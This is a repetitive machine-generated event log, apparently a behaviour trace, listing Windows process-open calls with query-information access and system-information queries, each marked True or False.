Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
